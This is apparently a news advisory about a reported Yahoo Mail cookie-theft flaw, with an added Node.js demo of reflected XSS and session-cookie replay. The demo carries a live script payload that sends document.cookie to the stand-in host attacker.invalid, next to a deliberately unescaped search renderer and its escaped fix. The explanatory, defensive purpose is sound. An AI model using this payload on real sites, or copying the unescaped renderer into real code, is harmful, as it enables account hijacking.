We were recently contacted by an independent security solutions company, “TechDefence Pvt Ltd”, started by Sunny Vaghela, telling us that they have discovered a vulnerability in Yahoo accounts.
As reported to us, the vulnerability lets an unauthorized person into a Yahoo account by stealing the browser's Yahoo cookie. The attacker emails the victim a link that carries a script; when the victim clicks it, the script runs in the victim's browser in the context of Yahoo Mail and sends the browser's cookie to the attacker. With that cookie, the attacker can open the victim's Yahoo account without entering any password, because the site accepts the cookie as proof that the login already happened.
The alarming part of the story is that, according to the report, this script is not caught by the usual security software, spam filters and the like. A short extract from the email we received reads:
“The procedure is also very simple. He sends a script which is not a trojan nor a virus but just a common link; as a user clicks or opens the mail it grabs the information (cookie) on the browser and sends it to me. He has already tried the same on other service providers but it could not be done, as the loophole lies with the coding of Yahoo Mail. Not only Yahoo, but all the information available on the browser can be stolen. All the sites and gateways which require a Yahoo ID could be accessed after that. Which means if you access your job site, social networking, or have your Yahoo Mail ID as an alternate ID for some other mail through your Yahoo account, it will give access to all. The shocking thing is that the hacker's IP address is not at all going to be logged on the Yahoo server, even though he can access the victim's account for 48 hours.”
Although we have not tested this vulnerability and do not guarantee the correctness of the information provided by TechDefence Pvt Ltd, it is wise to be safe rather than sorry. We bring this information to you only to keep you alert to a possible vulnerability, which may or may not exist.
To stay safe from attacks of this kind, do not open email attachments of any kind from unidentified sources, and do not click links inside email messages. If you must open a particular link, copy the link address without clicking it and paste it into a different browser from the one in which you are signed in to Yahoo. Different browser programs keep separate cookie stores, so even if the script runs, it cannot read the cookies of the browser where you are logged in. This only helps if the second browser really is a separate program (or a fresh private window with no Yahoo login), not just another tab or window of the same browser.
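The attack path described above, and the reason the cookie alone is enough, can be made concrete in code. The following is an added Node.js example written for this page; it is not code from the original article, from Yahoo, or from TechDefence. It models a search page that reflects a query parameter into HTML without escaping, the link an attacker would send, a toy “browser” that evaluates that one cookie-stealing idiom, and the server-side session lookup that the stolen cookie then satisfies, beside the hardened form of the page. All hostnames (`mail.example.com`, `attacker.invalid`), cookie names and session values are constructed for the demonstration.

```javascript
// Added example, not code from the original article or from Yahoo/TechDefence.
// Models the attack path in Node.js: a page that reflects a query parameter
// into HTML without escaping, a link whose parameter carries a cookie-stealing
// script, a toy "browser" that evaluates that one idiom, and the server-side
// session lookup that the stolen cookie then satisfies.
// All hostnames, cookie names and session values are constructed for the demo.

// Constructed cookie jar, as a browser would hold it for mail.example.com.
// Only cookies without HttpOnly are visible to script via document.cookie.
const COOKIE_JAR = [
  { name: "session", value: "abc123", httpOnly: false },
  { name: "prefs", value: "lang=en", httpOnly: false },
  { name: "sid_secure", value: "xyz789", httpOnly: true },
];

// What document.cookie would return for this jar.
function documentCookie(jar) {
  return jar
    .filter((c) => !c.httpOnly)
    .map((c) => `${c.name}=${c.value}`)
    .join("; ");
}

// Vulnerable search page: the "q" parameter is reflected straight into HTML.
function renderSearchVulnerable(query) {
  return `<h1>Results for ${query}</h1>`;
}

// Hardened form: HTML-escape anything that came from the request.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}
function renderSearchHardened(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`;
}

// The attacker's link: an ordinary-looking URL on the mail site whose query
// string carries a script that sends document.cookie to the attacker's host.
const PAYLOAD =
  '<script>new Image().src="https://attacker.invalid/c?d="+encodeURIComponent(document.cookie)</script>';
const ATTACK_LINK = "https://mail.example.com/search?q=" + encodeURIComponent(PAYLOAD);

// Server-side parameter extraction, as the search handler would do it.
function queryParam(link, name) {
  return new URL(link).searchParams.get(name);
}

// Toy browser: if the rendered HTML contains the exfiltration idiom above as a
// live <script>, return the URL the image request would be sent to (what leaks);
// otherwise null. Escaped markup never matches because "<script>" is gone.
function simulateScriptExfil(html, jar) {
  const m = html.match(
    /<script>new Image\(\)\.src="([^"]+)"\+encodeURIComponent\(document\.cookie\)<\/script>/,
  );
  if (!m) return null;
  return m[1] + encodeURIComponent(documentCookie(jar));
}

// Attacker side: turn the received request into a Cookie header to replay.
function stolenCookieHeader(exfilUrl) {
  return new URL(exfilUrl).searchParams.get("d");
}

// Server side: constructed session store and cookie-based authentication.
// No password is checked here; the session cookie alone identifies the user,
// which is exactly why a copied cookie is enough.
const SESSIONS = { abc123: "victim@example.com" };
function parseCookieHeader(header) {
  const out = {};
  for (const part of header.split(";")) {
    const i = part.indexOf("=");
    if (i < 0) continue;
    out[part.slice(0, i).trim()] = part.slice(i + 1).trim();
  }
  return out;
}
function userForCookieHeader(header) {
  return SESSIONS[parseCookieHeader(header).session] || null;
}

// Full chain for a given renderer; returns what it leaks and who gets hijacked.
function runDemo(render) {
  const html = render(queryParam(ATTACK_LINK, "q"));
  const exfil = simulateScriptExfil(html, COOKIE_JAR);
  const user = exfil ? userForCookieHeader(stolenCookieHeader(exfil)) : null;
  return { html, exfil, hijackedUser: user };
}

console.log(runDemo(renderSearchVulnerable));
console.log(runDemo(renderSearchHardened));
```

Two things to take from the run. With the vulnerable renderer, the `session` cookie leaves the browser and the replayed `Cookie` header logs the attacker in as the victim with no password step at all; with the hardened renderer the same link produces only escaped text and nothing leaks. The `sid_secure` cookie, marked HttpOnly, never appears in the leaked string in either case: output escaping is what removes the injection, and HttpOnly on the session cookie is the server-side control that would blunt this particular exfiltration even if an injection slipped through. Whether Yahoo's cookies at the time carried that flag is not something the article establishes.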
source – DailyPioneer